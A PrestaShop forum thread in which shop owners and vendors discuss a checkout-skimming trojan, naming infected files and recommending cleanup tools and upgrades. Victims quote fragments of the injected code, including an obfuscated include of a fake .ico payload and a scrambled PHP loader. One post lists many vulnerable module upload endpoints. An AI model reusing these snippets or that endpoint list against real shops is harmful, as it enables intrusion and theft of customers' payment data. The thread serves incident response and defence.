Jump to content

Prestashop 1.6 trojan. New method


Prescol

Recommended Posts

I spent 6 hours finding the files modified by this trojan who replaces checkout process with its own content to stole credit card or paypal accounts. So, in order to prevent to you more hours of research, here are some tips to find it out.

The attacker injects a code into smarty_cacheresource.php. This code, which is obsuscated in a way only a russian government can do, creates a fake smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it. 
Then, a subtle modification is added into smarty_internal_data::assign() method. The following line is added before assigning a variable.

$tpl_var = Smarty_Internal_Validate::Validate($tpl_var);

It looks like it is part of Prestashop environment, but is not. This call injects into $hook_header a malicious javascript, which is responsible for replacing the original payment button with the fake one. 

I found the same behavior recently in another shop, but the way they injected the code were much simpler, by decoding a file containing malicious javascirpt within a tpl.

Hope it helps to you if are under the same situation. For me was a pain in the ass spending half day searching it. 

Edited by Prescol (see edit history)
  • Like 5
Link to comment
Share on other sites

  • Prescol changed the title to Prestashop 1.6 trojan. New method

I passed the same injection today, it inffect a lot of files, but I don't know how to prevent to be infected. To correct your Presta it helps to copy original files over infected ones.

Infected files:

  • controllers\front\IndexController.php
  • modules\bankwire\controllers\front\validation.php
  • tools\smarty\sysplugins\smarty_cacheresource.php
  • tools\smarty\sysplugins\smarty_internal_data.php
  • cache\tcpdf\index.php
Link to comment
Share on other sites

  • 2 weeks later...
On 1/12/2023 at 5:07 PM, Prescol said:

I spent 6 hours finding the files modified by this trojan who replaces checkout process with its own content to stole credit card or paypal accounts. So, in order to prevent to you more hours of research, here are some tips to find it out.

The attacker injects a code into smarty_cacheresource.php. This code, which is obsuscated in a way only a russian government can do, creates a fake smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it. 
Then, a subtle modification is added into smarty_internal_data::assign() method. The following line is added before assigning a variable.

$tpl_var = Smarty_Internal_Validate::Validate($tpl_var);

It looks like it is part of Prestashop environment, but is not. This call injects into $hook_header a malicious javascript, which is responsible for replacing the original payment button with the fake one. 

I found the same behavior recently in another shop, but the way they injected the code were much simpler, by decoding a file containing malicious javascirpt within a tpl.

Hope it helps to you if are under the same situation. For me was a pain in the ass spending half day searching it. 

 

I migrated to 1.7 because of this trojan

IDK what's worse..

  • Haha 2
Link to comment
Share on other sites

f**k. me.

 

so what does your "cleaner" do? overwrites the core modified files?

has anyone found the point of entry of this hack?

 

i thought was either the outdated php version I was running with (5.6) or the PS installation (1.6)

now im on php 7.4 and PS 1.7 please tell me I'm OK or I'll kill myself XD

Edited by Shin_P (see edit history)
  • Haha 1
Link to comment
Share on other sites

Cleaner scans and informs you if core files have been modified, if known infections have been added, blocks certain malicious codes, destroys known added files.

The infection comes either from a badly secured third-party module, or from another CMS installed on the same hosting (WordPress not up to date or other)

The PHP version has nothing to do with the hack.

 

The 1.6.2 version will be so cool ;)

  • Thanks 1
Link to comment
Share on other sites

It is a planned atack and backed by an institution, not someone in his house, bad times are coming for maintenance since each time a prestashop store is attacked it is made with zero day exploits, meaning they were kept secret until today.

  • Like 1
Link to comment
Share on other sites

on clean shop this module will tell you when files have been modified, size/time/group/owner.

  • commit trusted change
  • restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 

Link to comment
Share on other sites

Had my own fight with this today and would like to share my findings.

I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes was back.

After searching access logs i found that 2 files in classes was changed. Tools.php and Dispatcher.php

These changes allowed the intruder to call ini.php though POST and it would create this file in the root.

It was the plugin TMSocialLogin that was used as a way in.

This was on Prestashop 1.6

Link to comment
Share on other sites

il y a 2 minutes, nsordk a dit :

Had my own fight with this today and would like to share my findings.

I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes was back.

After searching access logs i found that 2 files in classes was changed. Tools.php and Dispatcher.php

These changes allowed the intruder to call ini.php though POST and it would create this file in the root.

It was the plugin TMSocialLogin that was used as a way in.

This was on Prestashop 1.6

Cleaner detect this^^

https://shop.devcustom.net/fr/content/16-nettoyage-hack

Link to comment
Share on other sites

On 2/6/2023 at 6:11 PM, PrestaHeroes.com said:

on clean shop this module will tell you when files have been modified, size/time/group/owner.

  • commit trusted change
  • restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 

this will detect and you can restore.

if you manually detect and 'fix', set the leak files to read only.

also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules...

Link to comment
Share on other sites

Il y a 12 heures, Fred PrestaHeroes a dit :

also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules...

Lol

last infections detected on 1.7.8 version

/*b3b2b*/

@include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co");

/*b3b2b*/

fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico

Link to comment
Share on other sites

11 hours ago, Eolia said:

Lol

last infections detected on 1.7.8 version



@include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co");

fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico

Oh, so you think all ps are hacked? I think it's more when people use free mods which i defended to have removed from the forum....also 1.7.5 and earlier ps did dirty they create mod folder with 777 during installation. I caught them once years ago and they took it away...but it's back...

we do a lot of different stores and many customers over the years the number of people hacked was zero. We are getting new customers who are currently being hacked, one selling balls in the US for over 1,000,000 a month...the hack sent all customer info and cc info. Amazing..

Anyway, I "know" I wrote the best detect/restore module for "any" cms after my 1.4 module store was hacked, I was pissed loool.

we also have a plesk extension that does what ImunifyAV does but also has rollback...among other things.

cybersecurity is like porn, but you have to pay for it. it's me

I also have a module that analyzes ps permissions, we thought of releasing it for free but it provides information for hackers to attack....amazing.

using google translate, why do we even have separate forums, today's browser translations work fine...

Have a good weekend

Link to comment
Share on other sites

I'm just saying that the PS version has nothing to do.

For a hack to take place there are not 36 solutions:

- Theft of FTP credentials

- Unsecured module with upload functions

- Other unsecured CMS on the same hosting (8 obsolete WPs lately have infected PS)

Prestashop, since versions 1.2 has always controlled uploads and has never allowed direct access to these directories.

Regarding the rights, once a module is installed, regardless of whether it is 777, 755 or other, PHP can run create modify directories.

Edited by Eolia (see edit history)
Link to comment
Share on other sites

If you speak in English in this channel, everyone could know what are you talking about and the information will be useful for all, despite this message is posted in the english channel.

Please @Eolia and fred, im appealing to your experience in the forum, update your messages with an english version. 

Link to comment
Share on other sites

@EoliaI don't understand the trojan new method at all in this post.
"The attacker injects a code into smarty_cacheresource.php" This is a default file in PrestaShop right?
How is this trojan injected as the owner of this post says? Or is it injected in that file through a module?

Link to comment
Share on other sites

No, this smarty_cacheresource.php story could only allow a possible reading of the database by XSS injection and ONLY in case you have activated MySQL caching.
A patch has been proposed for all versions at this level.
Today's hacks have nothing to do with and, FYI, have been around for a long time.

https://bb.enter-solutions.net/topic/1075/des-modules-et-des-hacks-liste-non-exhaustive-des-modules-présentant-un-risque/16

  • Like 3
Link to comment
Share on other sites

  • 1 month later...
On 1/27/2023 at 5:21 PM, Eolia said:

Use my cleaner.php this hack is detected ;)

https://devcustom.net/public/scripts/cleaner.zip

Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php
 

I suggest you change the behavior of the script, so it don't delete, edit or replace files automatically.
A better approach would be to display all the errors and let the user decide if he want to delete, edit or replace each error.

Link to comment
Share on other sites

  • 4 weeks later...
14 hours ago, Boonyawat said:

Is there a way to prevent this?  I have a recent backup files so I decided to Restore my website. But I wonder how I can prevent this not happen again.

yes, upgrade to latest 1.7, remove all those disabled and free modules...

stop loading free modules, I don't know why PS allows unvetted free modules on forums.

very few hacks have been successful with 'addons' betted modules.

then put on hosting that supports Immunavy....

 

if PS is not a hobby but serious business,  sitting on hands on old PS...that's on you, loading free unvetted modules...that is on PS and you

 

 

Link to comment
Share on other sites

  • 1 month later...
Le 4/10/2023 à 10:54 PM, PrestaHeroes USA a dit :

very few hacks have been successful with 'addons' betted modules.

- sendtoafriend (native)
- paypal (native)
- all modules with php-unit ... eval-stdin.php (native & addons)
- attributewizardpro (addons)
- cartabandonmentpro (addons)
- ...

List contains numerous examples that contradict such statement.

  • Like 2
Link to comment
Share on other sites

5 hours ago, doekia said:

- sendtoafriend (native)
- paypal (native)
- all modules with php-unit ... eval-stdin.php (native & addons)
- attributewizardpro (addons)
- cartabandonmentpro (addons)
- ...

List contains numerous examples that contradict such statement.

well that is very few compared to the 1000's on there, at least they have to go through validation,  so yes three are a few, I would think PS updated their validation to try to keep those things from happent, on the free modules, that does not happen...so your point falls on deaf ears

Link to comment
Share on other sites

Very few ?

 

yuzu/yuzuCheck.php
yuzu/yuzuApi.php
columnadverts/uploadimage.php
columnadverts/slides/error.php
vtemslideshow/uploadimage.php
vtemslideshow/slides/error.php
realty/include/uploadimage.php
realty/include/slides/error.php
realty/evogallery/uploadimage.php
realty/evogallery/slides/error.php
realty/evogallery2/uploadimage.php
realty/evogallery2/slides/error.php
resaleform/upload.php
filesupload/error.php
megaproduct/
megaproduct/error.php
soopamobile/uploadimage.php
soopamobile/slides/error.php
soopamobile2/uploadimage.php
soopamobile2/slides/error.php
soopamobile2/uploadproduct.php
soopabanners/uploadimage.php
soopabanners/slides/error.php
vtermslideshow/uploadimage.php
vtermslideshow/slides/error.php
simpleslideshow/uploadimage.php
simpleslideshow/slides/error.php
productpageadverts/uploadimage.php
productpageadverts/slides/error.php
homepageadvertise/uploadimage.php
homepageadvertise/slides/error.php
homepageadvertise2/uploadimage.php
homepageadvertise2/slides/error.php
columnadverts2/uploadimage.php
columnadverts2/slides/error.php
filesupload/upload.php
filesupload/uploads/error.php
jro_homepageadvertise/uploadimage.php
jro_homepageadvertise/slides/error.php
jro_homepageadvertise2/uploadimage.php
jro_homepageadvertise2/slides/error.php
leosliderlayer/uploadimage.php
leosliderlayer/slides/error.php
leosliderlayer/upload_images.php
vtemskitter/uploadimage.php
vtemskitter/img/error.php
additionalproductstabs/file_upload.php
additionalproductstabs/file_uploads/error.php
addthisplugin/file_upload.php
addthisplugin/file_uploads/error.php
attributewizardpro/file_upload.php
attributewizardpro/file_uploads/error.php
attributewizardpro.OLD/file_upload.php
attributewizardpro.OLD/file_uploads/error.php
1attributewizardpro/file_upload.php
1attributewizardpro/file_uploads/error.php
attributewizardpro_x/file_upload.php
attributewizardpro_x/file_uploads/error.php
advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%252526id_slide=php
advancedslider/uploads/error.php
bamegamenu/ajax_phpcode.php
cartabandonmentpro/upload.php
cartabandonmentpro/uploads/error.php
cartabandonmentproOld/upload.php
cartabandonmentproOld/uploads/error.php
videostab/ajax_videostab.php?action=submitUploadVideo%252526id_product=upload
videostab/uploads/error.php
fieldvmegamenu/ajax/upload.php
fieldvmegamenu/uploads/error.php
orderfiles/ajax/upload.php
orderfiles/files/error.php
pk_flexmenu/ajax/upload.php
pk_flexmenu/uploads/error.php
pk_flexmenu_old/ajax/upload.php
pk_flexmenu_old/uploads/error.php
pk_vertflexmenu/ajax/upload.php
pk_vertflexmenu/uploads/error.php
nvn_export_orders/upload.php
nvn_export_orders/error.php
tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php
tdpsthemeoptionpanel/upload/error.php
psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php
psmodthemeoptionpanel/upload/error.php
lib/redactor/file_upload.php
blocktestimonial/addtestimonial.php
colorpictures
explorerpro
sampledatainstall
vm_advancedconfigurator
marketplace/libs/filemanager/dialog.php
ec_import/upload.php
vtemskitter/uploadimage.php
blocktestimonial/addtestimonial.php
/index.php?fc=module&module=orderfiles&controller=filesmanager
/index.php?fc=module&module=supercheckout&controller=supercheckout&ajax=1&method=SaveFilesCustomField
smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php
Injection possible depuis plusieurs fichiers du module infobia_properso:
infobia_properso/admin/upload.php
infobia_properso/admin/upload_motif.php
infobia_properso/maquetteajax.php
infobia_properso/transfert.php
infobia_properso/transfert2.php
infobia_properso/transfertjson.php
infobia_properso/upload.php
infobia_properso/uploadfile.php
nvn_excel_import/hayageekupload/php/upload.php
nvn_excel_import/upload.php
nvn_excel_import/uploadify.php
pkfacebook

  • Like 2
Link to comment
Share on other sites

On 7/2/2023 at 12:11 AM, PrestaHeroes USA dice:

on clean shop this module will tell you when files have been modified, size/time/group/owner.

  • commit trusted change
  • restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 

It is compatible with PS8 and PHP8.1?

Link to comment
Share on other sites

3 hours ago, DARKF3D3 said:

It is compatible with PS8 and PHP8.1?

I have just assigned someone to validate our modules on ps8, pv will be one of the first.  Will update here or via messenger.  Note: we have a plesk version of this module which has more features and can protect other/all domains defined to plesk....in case anyone interested.

  • Like 1
Link to comment
Share on other sites

  • 1 month later...
  • 4 months later...

Hi,

I have a PS 1.6.1.4 version, in march it was hacked somehow redirected card payment page.
At that time I solved with this:(link)
To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):
if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') { include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php'; $smarty->caching_type = 'mysql'; }

Right now again it was discovered JS/SpyBanker.IVtrojan.

I see some files changed, for ex.
classes/shop/shop.php
classes/Store.php
etc.

has something like this at the end:
$r1e="d63LgMkA570XFPH2wSZiKncUjVoaCGOlExDW_s48ftYJ9NTyzBvmhIQpbeuRqr1";$w85=$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[26].$r1e[21].$r1e[36].$r1e[57].$r1e[33].$r1e[19].$r1e[37].$r1e[41].$r1e[37];$i17cd=$r1e[22].$r1e[61].$r1e[57].$r1e[27].$r1e[41].$r1e[57].$r1e[36].$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[2KCk7IAl9Owo='));@$x3e4e();}

i know that the updgrare is imminent but right now i need to restart the shop asap, but right now i dont finded the right person

my question is the upper solution with cleaner.zip is ok for this old 1.6.1.4 version?

thank you

ron

 

Link to comment
Share on other sites

1 hour ago, ronniee said:

i know that the updgrare is imminent but right now i need to restart the shop asap, but right now i dont finded the right person

This and further hacks will (most likely) increase. It should lead to a broader concept of shops. Do not only have one shop, have several, that way you can redirect visitors and it's highly unlikely that you hacked all versions. 

Those set ups need time to monitor. Businesses grow and so does their employee number. 

Search your log and access files you might get the perpetrator.  

Link to comment
Share on other sites

  • 2 months later...
On 2/2/2023 at 11:55, Eolia said:

Lol

Questo trojan è presente anche nelle versioni 1.7/8^^

Hi Eolia,

thank you for providing your cleaner.php which I used on one of my sites and discovered it was infected. I replaced all the files in red with the original files from the exact version of prestashop 1.6.1.20. This did not solve the initial problem that the generated pdf invoices are unreadable.. I attach img.

Since I have two domains with two different sites in the same Hosting space, I would like to check the second site too, which is made with prestashop 1.7.8.8

I tried to put the cleaner.php in different places, but if I put it in public_html it starts but I read in "cleaner" that there are two directories to close one or something like that, how can I make cleaner? also do you have any suggestion for the correct creation of pdf invoices, thanks

Have a nice day
Elio

Fattuta_illegibile.png

Directory.png

Link to comment
Share on other sites

22 hours ago, Eolia said:

delete your second admin.

How? delete your second admin.
But there is a site built in the second domain.

Or maybe there is um method I don't know, so I can control the second site, thanks 

Link to comment
Share on other sites

2 hours ago, micelio said:

Or maybe there is um method I don't know, so I can control the second site, thanks 

Why don't you take the time and plan ahead, the 1.6 site you could convert into a eolia shop or Thirtybees. That way you have a fresh design, can clean the database and speed everything up.

To use 2 shops in the same hosting is not really prudent, I know most people act due to ease. But you become dependent. Dependency is not what you need in business. 

It costs you about €50 to 100 per year to use a 2nd hosting. The times where one shop conquered the world like Amazon are clearly over. Several shops raise chances in ranking over a broader spectrum and give you more security. Except if they infect your PC. 

If you wish for safety, use a Laptop to access shops and another to open emails.  

Link to comment
Share on other sites

5 hours ago, Eolia said:

2 different Prestashop sites cannot have files in common.
Your second site must be in another directory.
A Prestashop site must only have one admin directory.

do you know if there is a practical way to separate the two sites? Since they are both in the same hosting is they have folders in common.

The second domonio is under construction, I could redo it and it is not a problem.

I would just like to save the site which is: www.micelimoto.com and I am fine with prestashop version 1.6.1.20

Thank you

Link to comment
Share on other sites

Keep all your directories except the duplicate admin.


Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory.
Then, install your Prestashop (or PhenixSuite) in your new directory)

Link to comment
Share on other sites

2 hours ago, Eolia said:

Keep all your directories except the duplicate admin.


Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory.
Then, install your Prestashop (or PhenixSuite) in your new directory)

I think I am not capable of doing what you tell me.

I can create in the same level as public_html a new directory (new folder) and name it after the name of the 2 domain, okay?

I don't know how to get my second domain to point to this new directory.

But won't all the existing shared directories of the two different versions of prestashop bother each other?

Could you help me with that? I would like to correct this situation I have in hosting. Create two completely separate sites in the same space, each with its own version of prestashop. Do you think this correction can be made? Thanks

Link to comment
Share on other sites

Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cpanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much
 

Link to comment
Share on other sites

1 hour ago, Maxflor said:

and our server is overwhelmed and crashes.

Make a backup, export the database, clean everything up. Get a better server. While you at it change access to backend, databases.
In your shoes I would redo the entire shop.

 

Link to comment
Share on other sites

Nickz 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect clodflare to the website to speed it up a bit.

Thank you very much

Link to comment
Share on other sites

il y a 33 minutes, Maxflor a dit :

Nickz 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect clodflare to the website to speed it up a bit.

Thank you very much

Explain how to do in 2 minutes something that takes at least a day to do.

There are no secrets, no tricks to be passed on, just common sense, an analysis of all the files, of the entire structure, knowing the normal PrestaShop structure by heart saves time, but that's something you acquire over the long term, and I'm not even talking about intervening on a site that has never respected anything.

Everything has already been explained, sites reference all the security alerts, already posted several times, community modules allow you to identify vulnerabilities, already posted dozens of times, techniques have been explained, written in articles, to climb the first step of the staircase, but there's no secret, just work and knowledge.

You've got flaws, you haven't fixed them, and since your site has been hacked, it's going to be hacked every week by one or other technique, since it's now on the list of sites to be hacked.

The only way to do this is to clean up all the code in all the modules, one by one.

Link to comment
Share on other sites

Il y a 3 heures, Maxflor a dit :

Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cpanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much
 

https://devcustom.net/public/scripts/cleaner.zip

Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php

  • Thanks 2
Link to comment
Share on other sites

10 hours ago, Maxflor said:

 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails.

Redoing a shop removes every possible entrance to your shop.
Removing parts of code leaves the shop open to new hacks.

mails which are sent from your server mean you are hacked.

Link to comment
Share on other sites

  • 2 weeks later...

Hi friend i've been attacked by trojan some days ago

i placed a backup on local and tried the cleaner.php

but not working at well.

- It starts and check for upgrading 

- it download the upgraded file ('3.1.9') and reneamed itsefl by alfanumeric one

- but it stucks and don't start (also tried to reneme again in cleaner.php but it restart to says "telechargement de la dernier version....."

- i'm now in a loop, because after "telechargement" it sais "impossible to reach site"

anyone know is compatible with ps 1.6.1.7 and php 7?  (the version i'm running)

immagine_2024-03-01_112237682.thumb.png.f335f18af354a3dc1c4c9e9c62a4fbd1.png

 

   

immagine_2024-03-01_112324340.png

Link to comment
Share on other sites

  • 2 weeks later...

hi friends.

can help me, old prestashop 1.6 version with 3.2.1 cleaner have 500 internal server error.

i use old version cleaner script, this update after run, and i see change name this script and next - internal server error after seconds run script work. logs clear.

before cleaner started and work very fine, may be after script update this

500 Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator at to inform them of the time this error occurred, and the actions you performed just before this error.

More information about this error may be available in the server error log.

Link to comment
Share on other sites

  • 4 weeks later...
15 hours ago, Nickz said:

look into the server-logs, many times here: var/log/apache2/errorlog

Hello, i have only these 2 row :

 

[Wed Apr 17 08:48:45.882526 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] [client xxxxxx:33932] AH01067: Failed to read FastCGI header
[Wed Apr 17 08:48:45.882574 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] (104)Connection reset by peer: [client xxxxxx:33932] AH01075: Error dispatching request to :

Link to comment
Share on other sites

Our FileStasis Attack Surface Monitor(ASM) + Restore for PrestaShop module will 1) build vault of mission critical files 2) monitor and report when file changes/additions/deletions are found, allows you to commit trusted change to vault or restore untrusted change from vault.

The most important part of detecting hack is knowing which files changed, that is the purpose of this module.

https://prestaheroes.com/products/prestavault-malware-trojan-virus-protection?variant=40653346635983

 

Edited by PrestaHeroes USA (see edit history)
Link to comment
Share on other sites

  • 4 months later...

Got one question, the cleaner is good, but I got one problem. When I make the scan to bigger files it detects

Fichier dangereux supprimé (shell_exec) => web/modules/securitypro/securitypro.phpVoir

and deleted it. But this is the security plugin, that has of course a lot of rights, this shouldn't be deleted. How can I prevent him to do it? 

Link to comment
Share on other sites

shell_exec is a very big risk on a php script, besides many hosts block this function.

Cleaner don't create any folder, only zip files with detected files.

If you are happy with your security pro, why use cleaner?

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...